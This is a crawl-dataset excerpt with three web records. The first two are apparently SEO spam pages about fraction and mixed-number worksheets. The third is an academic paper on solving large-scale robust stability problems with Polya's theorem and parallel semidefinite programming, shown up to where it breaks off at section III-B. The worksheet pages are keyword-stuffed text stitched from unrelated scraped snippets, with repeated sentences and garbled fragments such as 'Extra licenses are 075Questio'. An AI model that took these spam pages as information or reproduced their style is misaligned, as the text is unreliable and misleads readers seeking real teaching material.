URL
stringlengths
15
1.68k
text_list
sequencelengths
1
199
image_list
sequencelengths
1
199
metadata
stringlengths
1.19k
3.08k
https://winegeeknyc.netlify.app/limited-adding-mixed-numbers-worksheet/
[ "# 47+ Limited adding mixed numbers worksheet Most Effective\n\nWritten by Wayne Jan 26, 2021 · 8 min read", null, "Your Limited adding mixed numbers worksheet images are available. Limited adding mixed numbers worksheet are a topic that is being searched for and liked by netizens today. You can Find and Download the Limited adding mixed numbers worksheet files here. Get all free photos and vectors.\n\nIf you’re searching for limited adding mixed numbers worksheet pictures information linked to the limited adding mixed numbers worksheet interest, you have pay a visit to the right site. Our site frequently gives you hints for seeking the highest quality video and picture content, please kindly hunt and locate more enlightening video content and graphics that match your interests.\n\nLimited Adding Mixed Numbers Worksheet. The first is on addition the second is on subtraction and the third is on both operations. Great for a class review or homework activity. Adding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators. 22022018 Adding and subtracting fractions including mixed numbers homework sheet with answers.", null, "Adding Mixed Fraction Worksheet Promotiontablecovers From promotiontablecovers.blogspot.com\n\nIf the denominators are different then you must first find equivalent fractions with a. Mixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. There are also links to fraction and mixed number addition subtraction multiplication and division. How do you add mixed numbers. Nov 27 2015 - Reinforce common core skills with this fractions worksheet. Adding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators.\n\n### Mixed Numbers Add fractions with same and different denominators.\n\nStudents practice adding and subtraction mixed number in the 14 question worksheet. Some of the worksheets displayed are Grade 5 fractions work Fractions work converting mixed fractions to Convert between mixed fraction and improper fraction 1 Improper and mixed fractions Grade 5 fractions work Rename mixed to fractions with circles name complete Improper fractions mixed numbers Fractions work converting between mixed. Fractions - Practice converting improper fractions to mixed numbers. Ideal for grade 4 grade 5 and grade 6 these pdf worksheets abound in exercises on subtracting mixed numbers with like and unlike denominators subtracting fractions from mixed numbers and finding the missing mixed number in a. AddingMixed Numbers Other contents. Add up the whole-number and fractional parts separately for the sum.", null, "Source: greatschools.org\n\nMixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. Mixed Numbers Add fractions with same and different denominators. In this sixth grade fraction worksheet students are required to find the sum of mixed and whole numbers for each problem of this worksheet. Based on the colors written in each problem box students color the lettered grid. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions.", null, "Source: homeschoolmath.net\n\n16112019 A collection of three worksheets on adding and subtracting mixed numbers. Adding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators. In this sixth grade fraction worksheet students are required to find the difference between mixed and whole numbers for each problem of this worksheet. Our Adding and Subtracting Fractions and Mixed Numbers worksheets are designed to supplement our Adding and Subtracting Fractions and Mixed Numbers lessons. Adding Mixed Numbers Answer Key Showing top 8 worksheets in the category - Adding Mixed Numbers Answer Key.", null, "Source: pinterest.com\n\nConvert the mixed number to its equivalent irregular fraction convert the whole number to its equivalent fraction form find the LCM or LCD of denominators multiply the LCD with both numerator and denominator of each fractions simplify. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions. Make headway in subtracting two mixed numbers and finding their difference with this collection of printable mixed number subtraction worksheets. Students practice adding and subtraction mixed number in the 14 question worksheet. There are also links to fraction and mixed number addition subtraction multiplication and division.", null, "Source: pinterest.com\n\n22022018 Adding and subtracting fractions including mixed numbers homework sheet with answers. Adding mixed numbers unlike denominators Below are six versions of our grade 5 math worksheet on adding mixed numbers where the fractional parts of the numbers have different denominators. These ready-to-use printable worksheets help assess student learning. Detailed solutions are included. Some of the worksheets displayed are Grade 5 fractions work Fractions work converting mixed fractions to Convert between mixed fraction and improper fraction 1 Improper and mixed fractions Grade 5 fractions work Rename mixed to fractions with circles name complete Improper fractions mixed numbers Fractions work converting between mixed.", null, "Source: pinterest.com\n\nAfter solving each problem students find corresponding answers in the answer table. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. There are 7 addition and 7 subtraction problems and includes and answer key. The arithmetic in these questions is kept simple and students can try to formulate the answers mentally without writing down calculations. AddingMixed Numbers Other contents.", null, "Source: promotiontablecovers.blogspot.com\n\nMixed Numbers Add fractions with same and different denominators. In this sixth grade fraction worksheet students are required to find the sum of mixed and whole numbers for each problem of this worksheet. Nov 27 2015 - Reinforce common core skills with this fractions worksheet. 16112019 A collection of three worksheets on adding and subtracting mixed numbers. Based on the colors written in each problem box students color the lettered grid.", null, "Source: greatschools.org\n\nIf the denominators are different then you must first find equivalent fractions with a. Students practice adding and subtraction mixed number in the 14 question worksheet. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. You can add mixed numbers by first adding the whole numbers together and then the fractions. AddingMixed Numbers Other contents.", null, "Source: greatschools.org\n\nThere are two different ways which you can use when adding mixed numbers. This work is. Our Adding and Subtracting Fractions and Mixed Numbers worksheets are designed to supplement our Adding and Subtracting Fractions and Mixed Numbers lessons. AddingMixed Numbers Other contents. Detailed solutions are included.", null, "Source: greatschools.org\n\nMissing numbers - This worksheet helps children find the value of n. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions. Showing top 8 worksheets in the category - Converting Mixed Number. The first is on addition the second is on subtraction and the third is on both operations. These math worksheets are pdf files.", null, "Source: pinterest.com\n\nNov 27 2015 - Reinforce common core skills with this fractions worksheet. There are 7 addition and 7 subtraction problems and includes and answer key. Convert the mixed number to its equivalent irregular fraction convert the whole number to its equivalent fraction form find the LCM or LCD of denominators multiply the LCD with both numerator and denominator of each fractions simplify. The arithmetic in these questions is kept simple and students can try to formulate the answers mentally without writing down calculations. There are two different ways which you can use when adding mixed numbers.", null, "Source: homeschoolmath.net\n\nAdding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators. This worksheet includes 12 problems involving adding and subtracting mixed numbers. Extra licenses are 075Questio. Mixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. Add up the whole-number and fractional parts separately for the sum.", null, "Source: math-salamanders.com\n\nSheet includes practice AQA multiple choice. There are two different ways which you can use when adding mixed numbers. In this sixth grade fraction worksheet students are required to find the difference between mixed and whole numbers for each problem of this worksheet. This worksheet includes 12 problems involving adding and subtracting mixed numbers. Extra licenses are 075Questio.", null, "Source: homeschoolmath.net\n\nStudents practice adding and subtraction mixed number in the 14 question worksheet. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. Worksheet 1 Worksheet 2 Worksheet 3 Worksheet 4 Worksheet 5 Worksheet 6. Based on the colors written in each problem box students color the lettered grid. Great for a class review or homework activity.", null, "Source: pinterest.com\n\nSheet includes practice AQA multiple choice. Detailed solutions are included. Extra licenses are 075Questio. These math worksheets are pdf files. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions.", null, "Source: math-salamanders.com\n\nThese math worksheets are pdf files. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. Missing numbers - This worksheet helps children find the value of n. Mixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. In this sixth grade fraction worksheet students are required to find the difference between mixed and whole numbers for each problem of this worksheet.\n\nThis site is an open community for users to share their favorite wallpapers on the internet, all images or pictures in this website are for personal wallpaper use only, it is stricly prohibited to use this wallpaper for commercial purposes, if you are the author and find this image is shared without your permission, please kindly raise a DMCA report to Us.\n\nIf you find this site value, please support us by sharing this posts to your favorite social media accounts like Facebook, Instagram and so on or you can also save this blog page with the title limited adding mixed numbers worksheet by using Ctrl + D for devices a laptop with a Windows operating system or Command + D for laptops with an Apple operating system. If you use a smartphone, you can also use the drawer menu of the browser you are using. Whether it’s a Windows, Mac, iOS or Android operating system, you will still be able to bookmark this website.", null, "## 33++ Percentage increase and decrease worksheet Useful\n\nJan 08 . 8 min read", null, "## 11+ Positive using equations to solve word problems worksheet information\n\nJun 16 . 10 min read", null, "## 16++ Fresh preschool science worksheets Useful\n\nMay 25 . 8 min read", null, "## 40+ Amusing super math worksheets Awesome\n\nJun 05 . 6 min read", null, "## 30+ Printable spelling worksheets Useful\n\nFeb 17 . 9 min read", null, "## 17+ Extraordinay touch points math worksheets Latest News\n\nApr 25 . 6 min read" ]
[ null, "https://www.math-salamanders.com/image-files/adding-fractions-worksheets-5.gif", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8993812,"math_prob":0.8505008,"size":11213,"snap":"2021-43-2021-49","text_gpt3_token_len":2035,"char_repetition_ratio":0.23124275,"word_repetition_ratio":0.55939144,"special_character_ratio":0.17649157,"punctuation_ratio":0.078849226,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9947054,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-21T17:16:38Z\",\"WARC-Record-ID\":\"<urn:uuid:64dae0c2-176f-4247-9130-cf2fd307844d>\",\"Content-Length\":\"35291\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2f87a7c5-c54a-4c9a-b95d-8b48d0998bf8>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d4be8aa-b5f7-4c49-b7f5-ae9465cd3f61>\",\"WARC-IP-Address\":\"161.35.60.200\",\"WARC-Target-URI\":\"https://winegeeknyc.netlify.app/limited-adding-mixed-numbers-worksheet/\",\"WARC-Payload-Digest\":\"sha1:GQGCCXYFQMVVJDNLOFFP5TV5R5RW5YDG\",\"WARC-Block-Digest\":\"sha1:22JFGYYI2EKM26HY6STJWIBGYG7EUFQR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585439.59_warc_CC-MAIN-20211021164535-20211021194535-00317.warc.gz\"}"}
http://tagn.info/high-school-fractions-worksheets/detailed-lesson-plan-rational-equation-grand-i-objectives-at-the-end-of-the-lesson-students-should-be-able-to-a-high-school-math-review-worksheets-pdf/
[ "", null, "detailed lesson plan rational equation grand i objectives at the end of the lesson students should be able to a high school math review worksheets pdf.\n\nhigh school level fraction worksheets secondary fractions review worksheet pin by on maths math and,secondary school fractions worksheets high level fraction practice inspirational worksheet images,free high school fractions worksheets division of multiplying and dividing worksheet math review pdf fraction practice,high school fraction practice worksheets kids identify the worksheet fractions review secondary,high school fraction review worksheet printable math worksheets practice pdf,high school math review worksheets printable fraction practice worksheet,secondary school fractions worksheets free high math review simplifying worksheet kids apps reading writing,high school fraction practice worksheets free fractions printable math review pdf,high school level fraction worksheets geometry math worksheet photos of free fractions review,multiplication and division worksheets high free school fractions math review fraction practice." ]
[ null, "http://tagn.info/wp-content/uploads/2018/11/detailed-lesson-plan-rational-equation-grand-i-objectives-at-the-end-of-the-lesson-students-should-be-able-to-a-high-school-math-review-worksheets-pdf.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79803926,"math_prob":0.60078543,"size":1095,"snap":"2019-26-2019-30","text_gpt3_token_len":163,"char_repetition_ratio":0.28780934,"word_repetition_ratio":0.0,"special_character_ratio":0.1369863,"punctuation_ratio":0.06875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9967438,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-15T21:54:08Z\",\"WARC-Record-ID\":\"<urn:uuid:05dcfa2c-d991-4be4-bdbf-6d83c90fe787>\",\"Content-Length\":\"52912\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ab064742-b9cc-4d2a-9cd1-03b3ef87d4de>\",\"WARC-Concurrent-To\":\"<urn:uuid:81df0ba6-4e95-4a69-ac44-3969f3f1702b>\",\"WARC-IP-Address\":\"104.31.78.209\",\"WARC-Target-URI\":\"http://tagn.info/high-school-fractions-worksheets/detailed-lesson-plan-rational-equation-grand-i-objectives-at-the-end-of-the-lesson-students-should-be-able-to-a-high-school-math-review-worksheets-pdf/\",\"WARC-Payload-Digest\":\"sha1:YFG7JD6OEU2TZXWUDVEO4GKWI3Z4Z7U3\",\"WARC-Block-Digest\":\"sha1:U6XD6DCI7F2NB6SKYPLCL3YQLULVWRPY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195524254.28_warc_CC-MAIN-20190715215144-20190716001144-00314.warc.gz\"}"}
https://www.groundai.com/project/solving-large-scale-robust-stability-problems-by-exploiting-the-parallel-structure-of-polyas-theorem/
[ "Solving Large-Scale Robust Stability Problems by Exploiting the Parallel Structure of Polya’s Theorem\n\n# Solving Large-Scale Robust Stability Problems by Exploiting the Parallel Structure of Polya’s Theorem\n\n## Abstract\n\nIn this paper, we propose a distributed computing approach to solving large-scale robust stability problems on the simplex. Our approach is to formulate the robust stability problem as an optimization problem with polynomial variables and polynomial inequality constraints. We use Polya’s theorem to convert the polynomial optimization problem to a set of highly structured Linear Matrix Inequalities (LMIs). We then use a slight modification of a common interior-point primal-dual algorithm to solve the structured LMI constraints. This yields a set of extremely large yet structured computations. We then map the structure of the computations to a decentralized computing environment consisting of independent processing nodes with a structured adjacency matrix. The result is an algorithm which can solve the robust stability problem with the same per-core complexity as the deterministic stability problem with a conservatism which is only a function of the number of processors available. Numerical tests on cluster computers and supercomputers demonstrate the ability of the algorithm to efficiently utilize hundreds and potentially thousands of processors and analyze systems with 100+ dimensional state-space. The proposed algorithms can be extended to perform stability analysis of nonlinear systems and robust controller synthesis.\n\nRobust stability, Polynomial optimization, Large-scale systems, Decentralized computing\n\n## I Introduction\n\nThis paper addresses the problem of stability of large-scale systems with several unknown parameters. Control system theory when applied in practical situations often involves the use of large state-space models, typically due to inherent complexity of the system, the interconnection of subsystems, or the reduction of an infinite-dimensional or PDE model to a finite-dimensional approximation. One approach to dealing with such large scale models has been to use model reduction techniques such as balanced truncation . However, the use of model reduction techniques are not necessarily robust and can result in arbitrarily large errors. In addition to large state-space, practical problems often contain uncertainty in the model due to modeling errors, linearization, or fluctuation in the operating conditions. The problem of stability and control of systems with uncertainty has been widely studied. See, e.g. the texts [2, 3, 4, 5]. However, a limitation of existing computational methods for analysis and control of systems with uncertainty is high complexity. This is a consequence of fact that the problem of robust stability of systems with parametric uncertainty is known to be NP-hard [6, 7]. The result is that for systems with parametric uncertainty and with hundreds of states, existing algorithms will fail with the primary point of failure usually being lack of unallocated memory.\n\nIn this paper, we seek to distribute the computation laterally over an array of processors within the context of existing computational resources. Specifically, we seek to utilize cluster-computing, supercomputing and Graphics Processing Unit (GPU)-computing architectures. When designing algorithms to run in a parallel computing environment, one must both synchronize computational tasks among the processors while minimizing communication overhead among the processors. This can be difficult, as each architecture has a specific communication graph. we account for communication by explicitly modeling the required communication graph between processors. This communication graph is then mapped to the processor architecture using the Message-Passing Interface (MPI) . While there are many algorithms for robust stability analysis and control of linear systems, ours is the first which explicitly accounts for the processing architecture in the emerging multi-core computing environment.\n\nOur approach to robust stability is based on the well-established use of parameter-dependent Quadratic-In-The-State (QITS) Lyapunov functions. The use of parameter-dependent Lyapunov QITS functions eliminates the conservativity associated with e.g. quadratic stability , at the cost of requiring some restriction on the rate of parameter variation. Specifically, our QITS Lyapunov variables are polynomials in the vector of uncertain parameters. This is a generalization of the use of QITS Lyapunov functions with affine parameter dependence as in  and expanded in, e.g. [11, 12, 13, 14]. The use of polynomial QITS Lyapunov variables can be motivated by , wherein it is shown that any feasible parameter-dependent LMI with parameters inside a compact set has a polynomial solution or  wherein it is shown that local stability of a nonlinear vector field implies the existence of a polynomial Lyapunov function.\n\nThere are several results which use polynomial QITS Lyapunov functions to prove robust stability. In most cases, the stability problem is reduced to the general problem of optimization of polynomial variables subject to LMI constraints - an NP-hard problem . To avoid NP-hardness, the polynomial optimization problem is usually solved in an asymptotic manner by posing a sequence of sufficient conditions of increasing accuracy and decreasing conservatism. For example, building on the result in  provides a sequence of increasingly precise LMI conditions for robust stability analysis of linear systems with affine dependency on uncertain parameters on the complex unit ball. Necessary and sufficient stability conditions for linear systems with one uncertain parameter are derived in , providing an explicit bound on the degree of the polynomial-type Lyapunov function. The result is extended to multi-parameter-dependent linear systems in . Another important approach to optimization of polynomials is the Sum of Squares (SOS) methodology which replaces the polynomial positivity constraint with the constraint that the polynomial admits a representation as a sum of squares of polynomials [21, 22, 23, 24]. A version of this theorem for polynomials with matrix coefficients can be found in . While we have worked extensively with the SOS methodology, we have not, as of yet, been able to adapt algorithms for solving the resulting LMI conditions to a parallel-computing environment. Finally, there have been several results in recent years on the use of Polya’s theorem to solve polynomial optimization problems  on the simplex. An extension of the Polya’s theorem for uncertain parameters on the multisimplex or hypercube can be found in . The approach presented in this paper is an extension of the use of Polya’s theorem for solving polynomial optimization problems in a parallel computing environment.\n\nThe goal of this project is to create algorithms which explicitly map computation, communication and storage to existing parallel processing architectures. This goal is motivated by the failure of existing general-purpose Semi-Definite Programming (SDP) solvers to efficiently utilize platforms for large-scale computation. Specifically, it is well-established that linear programming and semi-definite programming both belong to the complexity class P-Complete, also known as the class of inherently sequential problems. Although there have been several attempts to map certain SDP solvers to a parallel computing environment [27, 28], certain critical steps cannot be distributed. The result is that as the number of processors increases, certain bottleneck computations dominate, leading a saturation in computational speed of these solvers (Amdahl’s law ). We avoid these bottleneck computations and communications by exploiting the particular structure of the LMI conditions associated with Polya’s theorem. Note that, in principle, a perfectly designed general-purpose SDP algorithm could identify the structure of the SDP, as we have, and map the communication, computation and memory constraints to the parallel architecture. Indeed, there has been a great deal of research on creating programming languages which attempt to do just this [30, 31]. However, at present such languages are mostly theoretical and have certainly not been incorporated into existing SDP solvers.\n\nIn addition to parallel SDP solvers, there have been some efforts to exploit structure in certain polynomial optimization algorithms to reducing the size and complexity of the resulting LMI’s. For example, in  symmetry was used to reduce the size of the SDP variables. Specific sparsity structure was used in [33, 34, 35] to reduce the complexity of the linear algebra calculations. Generalized approaches to the use of sparsity in SDP algorithms can be found in . Groebner basis techniques [36, 37] have been used by  to simplify the formulation of the SDPs associated with the SOS decomposition problems.\n\nThe paper is organized around two independent problems: setting up the sequence of structured SDPs associated with Polya’s theorem and solving them. Note that the problem of decentralizing the set-up algorithm is significant in that for large-scale systems, the instantiation of the problem may be beyond the memory and computational capacity of a single processing node. For the set-up problem, the algorithm that we propose has no centralized memory or computational requirements whatsoever. Furthermore, if a sufficient number of processors are available, the number of messages does not change with the size of the state-space or the number of Polya’s iterations. In addition, the ideal communication architecture for the set-up algorithm does not correspond to the communication structure of GPU computing or supercomputing. In the second problem, we propose a variant of a standard SDP primal-dual algorithm and map the computational, memory and communication requirements to a parallel computing environment. Unlike the set-up algorithm, the primal-dual algorithm does have a small centralized component corresponding to the update of the set of dual variables. However, we have structured the algorithm so that the size of this dual computation is solely a function of the degree of the polynomial QITS Lyapunov function and does not depend on the number of Polya’s iterations, meaning that the sequence of algorithms has fixed centralized computational and communication complexity. In addition, there is no communication between processors, which means that the algorithm is well suited to most parallel computing architectures. A graph representation of the communication architecture of both the set-up and SDP algorithms has also been provided in the relevant sections.\n\nCombining the set-up and SDP components and testing the result of both in cluster computing environments, we demonstrate the capability of robust analysis and control of systems with 100+ states and several uncertain parameters. Specifically, we ran a series of numerical experiments using a local Linux cluster and the Blue Gene supercomputer (with 200 processor allocation). First, we applied the algorithm to a current problem in robust stability analysis of magnetic confinement fusion using a discretized PDE model. Next, we examine the accuracy of the algorithm as Polya’s iterations progress and compare this accuracy with the SOS approach. We show that unlike the general-purpose parallel SDP solver SDPARA , the speed-up - the increase in processing speed per additional processor - of our algorithm shows no evidence of saturation. Finally, we calculate the envelope of the algorithm on the Linux cluster in terms of the maximum state-space dimension, number of processors and Polya’s iterations.\n\nNOTATION\n\nWe represent variate monomials as , where is the vector of variables and is the vector of exponents and is the degree of the monomial. We define as the totally ordered set of the exponents of variate monomials of degree , where the ordering is lexicographic. In lexicographical ordering precedes , if the left most non-zero entry of is positive. The lexicographical index of every can be calculated using the map defined as \n\n ⟨γ⟩=l−1∑j=1γi∑i=1f\\bbl(l−j,d+1−j−1∑k=1γk−i\\bbr)+1, (1)\n\nwhere as in \n\n f(l,d):=⎧⎪⎨⎪⎩0forl=0(l+d−1l−1)=(d+l−1)!d!(l−1)!forl>0, (2)\n\nis the cardinality of , i.e., the number of variate monomials of degree . For convenience, we also define the index of a monomial to be . We represent variate homogeneous polynomials of degree as\n\n P(α)=∑γ∈WdpP⟨γ⟩αγ, (3)\n\nwhere is the matrix coefficient of the monomial . We denote the element corresponding to the row and column of matrix as . The subspace of symmetric matrices in is denoted by . We define a basis for as\n\n [Ek]i,j:={1if i=j=k0otherwise,fork≤nand\n [Ek]i,j:=[Fk]i,j+[Fk]Ti,j,fork>n, (4)\n\nwhere\n\n [Fk]i,j:={1if i=j−1=k−n0otherwise. (5)\n\nNote that this choice of basis is arbitrary - any other basis could be used. However, any change in basis would require modifications to the formulae defined in this paper. The canonical basis for is denoted by for , where The vector with all entries equal to one is denoted by . The trace of is denoted by . The block-diagonal matrix with diagonal blocks is denoted or occasionally as . The identity and zero matrices are denoted by and .\n\n## Ii Preliminaries\n\nConsider the linear system\n\n ˙x(t)=A(α)x(t), (6)\n\nwhere and is a vector of uncertain parameters. In this paper, we consider the case where is a homogeneous polynomial and where is the unit simplex, i.e.,\n\n Δl={α∈Rl,l∑i=1αi=1,αi⩾0}. (7)\n\nIf is not homogeneous, we can obtain an equivalent homogeneous representation in the following manner. Suppose is a non-homogeneous polynomial with , is of degree and has monomials with non-zero coefficients. Define , where is the degree of the monomial of according to lexicographical ordering. Now define the polynomial as per the following.\n\n1. Let .\n\n2. For , multiply the monomial of , according to lexicographical ordering, by .\n\nThen, since , for all and hence all properties of are retained by the homogeneous system .\n\n1) Example: Construction of the homogeneous system .\n\nConsider the non-homogeneous polynomial of degree , where . Using the above procedure, the homogeneous polynomial can be constructed as\n\n B(α)=Cα21+Dα2(α1+α2+α3)+Eα3(α1+α2+α3) +F(α1+α2+α3)2=(C+FB1)α21+(D+2F)B2α1α2 +(E+2F)B3α1α3+(D+F)B4α22+(D+E+2F)B5α2α3 +(E+F)B6α23=∑γ∈W2B⟨γ⟩αγ. (8)\n\nThe following is a stability condition  for System (6). {thm} System (6) is stable if and only if there exists a polynomial matrix such that and\n\n AT(α)P(α)+P(α)A(α)≺0 (9)\n\nfor all . A similar condition also holds for discrete-time linear systems. The conditions associated with Theorem II are infinite-dimensional LMIs, meaning they must hold at infinite number of points. Such problems are known to be NP-hard . In this paper we derive a sequence of polynomial-time algorithms such that their outputs converge to the solution of the infinite-dimensional LMI. Key to this result is Polya’s Theorem . A variation of this theorem for matrices is given as follows.\n\n{thm}\n\n(Polya’s Theorem) The homogeneous polynomial for all if and only if for all sufficiently large ,\n\n (l∑i=1αi)dF(α) (10)\n\nhas all positive definite coefficients.\n\nUpper bounds for Polya’s exponent can be found as in . However, these bounds are based on the properties of and are difficult to determine a priori. In this paper, we show that applying Polya’s Theorem to the robust stability problem, i.e., the inequalities in Theorem II yields a semi-definite programming condition with an efficiently distributable structure. This is discussed in the following section.\n\n## Iii Problem Set-Up\n\nIn this section, we show how Polya’s theorem can be used to determine the robust stability of an uncertain system using linear matrix inequalities with a distributable structure.\n\n### Iii-a Polya’s Algorithm\n\nWe consider the stability of the system described by Equation (6). We are interested in finding a which satisfies the conditions of Theorem II. According to Polya’s theorem, the constraints of Theorem II are satisfied if for some sufficiently large and , the polynomials\n\n (l∑i=1αi)d1P(α)and (11)\n −(l∑i=1αi)d2(AT(α)P(α)+P(α)A(α)) (12)\n\nhave all positive definite coefficients.\n\nLet be a homogeneous polynomial of degree which can be represented as\n\n P(α)=∑γ∈WdpP⟨γ⟩αγ, (13)\n\nwhere the coefficients and where we recall that is the set of the exponents of all -variate monomials of degree . Since is a homogeneous polynomial of degree , we can write it as\n\n A(α)=∑γ∈WdaA⟨γ⟩αγ, (14)\n\nwhere the coefficients . By substituting (13) and (14) into (11) and (12) and defining as the degree of , the conditions of Theorem II can be represented in the form\n\n ∑h∈Wdpβ⟨h⟩,⟨γ⟩P⟨h⟩≻0;γ∈Wdp+d1and (15)\n ∑h∈Wdp(HT⟨h⟩,⟨γ⟩P⟨h⟩+P⟨h⟩H⟨h⟩,⟨γ⟩)≺0;γ∈Wdpa+d2. (16)\n\nHere is defined to be the scalar coefficient which multiplies in the -th monomial of the homogeneous polynomial using the lexicographical ordering. Likewise is the term which left or right multiplies in the -th monomial of using the lexicographical ordering. For an intuitive explanation as to how these and terms are calculated, we consider a simple example. Precise formulae for these terms will follow the example.\n\n1) Example: Calculating the and coefficients.\n\nConsider and . By expanding Equation (11) for we have\n\n (α1+α2)P(α)=P1α21+(P1+P2)α1α2+P2α22. (17)\n\nThe terms are then extracted as\n\n β1,1=1,β2,1=0,β1,2=1,β2,2=1,β1,3=0,β2,3=1. (18)\n\nNext, by expanding Equation (12) for we have\n\n (α1+α2)(AT(α)P(α)+P(α)A(α))=(AT1P1+P1A1)α31 +(AT1P1+P1A1+AT2P1+P1A2+AT1P2+P2A1)α21α2 +(AT2P1+P1A2+AT1P2+P2A1+AT2P2+P2A2)α1α22 +(AT2P2+P2A2)α32. (19)\n\nThe terms are then extracted as\n\n H1,1=A1, H2,1=0, H1,2=A1+A2, H2,2=A1, H1,3=A2, H2,3=A1+A2, H1,4=0, H2,4=A2. (20)\n\n2) General Formula: The can be formally defined recursively as follows. Let the initial values for be defined as\n\n β(0)⟨h⟩,⟨γ⟩={1if% h=γ0otherwiseforγ∈Wdpandh∈Wdp. (21)\n\nThen, iterating for , we let\n\n β(i)⟨h⟩,⟨γ⟩=∑λ∈W1β(i−1)⟨h⟩,⟨γ−λ⟩% forγ∈Wdp+iandh∈Wdp. (22)\n\nFinally, we set . To obtain , set the initial values as\n\n H(0)⟨h⟩,⟨γ⟩=∑λ∈Wda:λ+h=γA⟨λ⟩forγ∈Wdp+daandh∈Wdp. (23)\n\nThen, iterating for , we let\n\n H(i)⟨h⟩,⟨γ⟩=∑λ∈W1H(i−1)⟨h⟩,⟨γ−λ⟩forγ∈Wdpa+iandh∈Wdp. (24)\n\nFinally, set .", null, "Fig. 1: Number of β⟨h⟩,⟨γ⟩ and H⟨h⟩,⟨γ⟩ coefficients vs. the number of uncertain parameters for different Polya’s exponents and for dp=da=2\n\nFor the case of large-scale systems, computing and storing and is a significant challenge due to the number of these coefficients. Specifically, the number of terms increases with (number of uncertain parameters in system (6)), (degree of ), (degree of ) and (Polya’s exponents) as follows.\n\n3) Number of coefficients: For given and , since and , the number of coefficients is the product of and . Recall that card is the number of all -variate monomials of degree and can be calculated using (2) as follows.\n\n L0=f(l,dp)=⎧⎪⎨⎪⎩0forl=0(dp+l−1l−1)=(dp+l−1)!dp!(l−1)!forl>0. (25)\n\nLikewise, card, i.e., the number of all variate monomials of degree is calculated using (2) as follows.\n\n L=f(l,dp+d1)= ⎧⎪⎨⎪⎩0forl=0(dp+d1+l−1l−1)=(dp+d1+l−1)!(dp+d1)!(l−1)!forl>0. (26)\n\nThe number of coefficients is .\n\n4) Number of coefficients: For given and , since and , the number of coefficients is the product of and . By using (2), we have\n\n M=f(l,dpa+d2)= ⎧⎪⎨⎪⎩0forl=0(dpa+d2+l−1l−1)=(dpa+d2+l−1)!(dpa+d2)!(l−1)!forl>0. (27)\n\nThe number of coefficients is .\n\nThe number of and coefficients and the required memory to store these coefficients are shown in Figs. 1 and 2 in terms of the number of uncertain parameters and for different Polya’s exponents. In all cases .", null, "Fig. 2: Memory required to store β and H coefficients vs. number of uncertain parameters, for different d1,d2 and dp=da=2\n\nIt is observed from Fig. 2 that, even for small and , the required memory is in the Terabyte range. In , we proposed a decentralized computing approach to the calculation of on large cluster computers. In the present work, we extend this method to the calculation of and the SDP elements which will be discussed in the following section. We express the LMIs associated with conditions (15) and (16) as an SDP in both primal and dual forms. We also discuss the structure of the primal and dual SDP variables and the constraints.\n\n### Iii-B SDP Problem 